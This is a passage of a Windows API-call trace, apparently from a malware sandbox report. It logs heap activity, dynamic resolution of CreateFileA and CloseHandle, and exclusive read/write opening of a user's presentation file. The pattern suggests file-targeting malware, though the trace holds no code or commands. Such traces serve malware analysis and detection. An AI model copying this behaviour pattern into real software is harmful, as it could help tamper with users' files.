(HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899d0 [0033.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8899d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0033.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.365] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0033.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0033.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0033.365] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0033.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp", cchWideChar=80, lpMultiByteStr=0x7f3688, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp", lpUsedDefaultChar=0x0) returned 80 [0033.365] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0033.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.366] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\bqdze 0.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=80, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0033.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=80, lpWideCharStr=0x7d8558, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp") returned 80 [0033.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.368] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.368] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0033.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.369] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0033.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0033.369] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.369] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.370] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.371] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0033.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ce68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.371] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0033.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.371] CloseHandle (hObject=0x128) returned 1 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0033.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.372] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.372] HeapFree (in: 